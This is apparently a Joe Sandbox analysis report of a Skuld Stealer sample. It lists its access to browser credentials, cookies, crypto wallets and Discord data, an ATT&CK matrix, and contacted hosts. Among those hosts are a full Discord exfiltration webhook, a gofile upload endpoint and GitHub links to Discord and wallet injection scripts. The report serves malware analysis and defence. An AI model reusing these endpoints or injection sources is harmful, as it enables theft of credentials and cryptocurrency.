                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes\eventsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\content-prefs.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkeckeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\sessionstore-backupsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived\2023-10Jump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\saved-telemetry-pingsJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Tries to steal communication platform credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
                        Source: Yara matchFile source: skuld.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected Skuld Stealer
                        Source: Yara matchFile source: skuld.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services31
                        Data from Local System                        		3
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts122
                        Command and Scripting Interpreter                        		1
                        Windows Service                        		1
                        Windows Service                        		3
                        Disable or Modify Tools                        		LSASS Memory24
                        System Information Discovery                        		Remote Desktop Protocol1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        PowerShell                        		1
                        Registry Run Keys / Startup Folder                        		12
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		Security Account Manager131
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive4
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Registry Run Keys / Startup Folder                        		1
                        Install Root Certificate                        		NTDS2
                        Process Discovery                        		Distributed Component Object ModelInput Capture5
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets151
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Modify Registry                        		DCSync1
                        Remote System Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636046 Sample: skuld.exe Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 37 ip-api.com 2->37 39 discord.com 2->39 41 2 other IPs or domains 2->41 49 Sigma detected: Capture Wi-Fi password 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected Skuld Stealer 2->53 55 9 other signatures 2->55 9 skuld.exe 2 70 2->9         started        signatures3 process4 dnsIp5 43 ip-api.com 208.95.112.1, 49705, 80 TUT-ASUS United States 9->43 45 api.gofile.io 51.91.7.6, 443, 49706 OVHFR France 9->45 47 3 other IPs or domains 9->47 33 C:\Users\user\...\SecurityHealthSystray.exe, PE32+ 9->33 dropped 35 C:\Windows\System32\drivers\etc\hosts, ASCII 9->35 dropped 57 Installs new ROOT certificates 9->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 9->59 61 Uses cmd line tools excessively to alter registry or file data 9->61 63 11 other signatures 9->63 14 powershell.exe 9 9->14         started        17 powershell.exe 9->17         started        19 powershell.exe 9->19         started        22 12 other processes 9->22 file6 signatures7 process8 file9 65 Loading BitLocker PowerShell Module 14->65 29 C:\Users\user\AppData\...\dh1o0wbe.cmdline, Unicode 19->29 dropped 24 csc.exe 19->24         started        signatures10 process11 file12 31 C:\Users\user\AppData\Local\...\dh1o0wbe.dll, PE32 24->31 dropped 27 cvtres.exe 24->27         started        process13

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        skuld.exe25%VirustotalBrowse

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                        http://crl.mic0%Avira URL Cloudsafe
                        http://pesterbdd.com/images/Pester.pngP0%Avira URL Cloudsafe
                        https://oneget.orgXX0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        discord.com
                        		162.159.136.232
                        		truefalse
                          		high
                          api.ipify.org
                          		104.26.13.205
                          		truefalse
                            		high
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high
                              api.gofile.io
                              		51.91.7.6
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://ip-api.com/jsonfalse
                                  		high
                                  https://api.gofile.io/getServerfalse
                                    		high
                                    https://api.ipify.org/false
                                      		high
                                      https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbwfalse
                                        		high
                                        http://ip-api.com/line/?fields=hostingfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://github.com/Pester/PesterPpowershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://discord.com/api/v8/guilds/tooskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&seskuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://go.dev/issue/66821):skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                    		high
                                                    https://weibo.com/skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://media.discordapp.net/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.zhihu.com/skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://discord.gg/releaseskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                            		high
                                                            https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSONskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                              		high
                                                              https://www.msn.comskuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://discord.com/api/v9/users/SecurityHealthSystray.exe.0.drfalse
                                                                      		high
                                                                      http://crl.micft.cMicRosofpowershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgskuld.exe, 00000000.00000002.2728804738.000000C000054000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.ebay.co.uk/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/walletskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                  		high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://go.micropowershell.exe, 0000000D.00000002.1594297796.000001CAE037D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                            		high
                                                                                            https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0Shskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                              		high
                                                                                              https://www.amazon.com/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.micpowershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.jsrangeskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                    		high
                                                                                                    https://cdn.discordapp.com/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67d2skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://go.dev/pkg/crypto/rsa#hdr-Minimum_key_size)b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                        		high
                                                                                                        https://avatars.githubusercontent.com/u/145487845?v=4skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brskuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.olx.pl/skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://oneget.orgXXpowershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://crl.mpowershell.exe, 0000000F.00000002.1766382072.000002704FF15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://pesterbdd.com/images/Pester.pngPpowershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://bugzilla.moskuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.BoEX37k-iQhxskuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://aka.ms/pscore68powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://avatars.githubusercontent.com/u/145487845?v=4sqlite:skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                                            		high
                                                                                                                            https://support.mozilla.orgskuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlPpowershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%sskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://images-ext-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/htskuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://oneget.orgpowershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.baidu.com/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          208.95.112.1
                                                                                                                                          		ip-api.comUnited States
                                                                                                                                          		53334TUT-ASUSfalse
                                                                                                                                          162.159.136.232
                                                                                                                                          		discord.comUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          162.159.137.232
                                                                                                                                          		unknownUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          51.91.7.6
                                                                                                                                          		api.gofile.ioFrance
                                                                                                                                          		16276OVHFRfalse
                                                                                                                                          104.26.13.205
                                                                                                                                          		api.ipify.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                          Analysis ID:1636046
                                                                                                                                          Start date and time:2025-03-12 10:39:55 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 5m 43s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:23
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:skuld.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@34/24@5/5
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.253.72, 4.175.87.197
                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          05:40:46API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                                                                          05:40:50API Interceptor70x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          208.95.112.1SilverBullet. v1.1.4.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                          • ip-api.com/json
                                                                                                                                          zlient.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • /json/
                                                                                                                                          config.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          fTCzwFJhuy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          boyjhpskdfawd.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                          • ip-api.com/json/
                                                                                                                                          KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
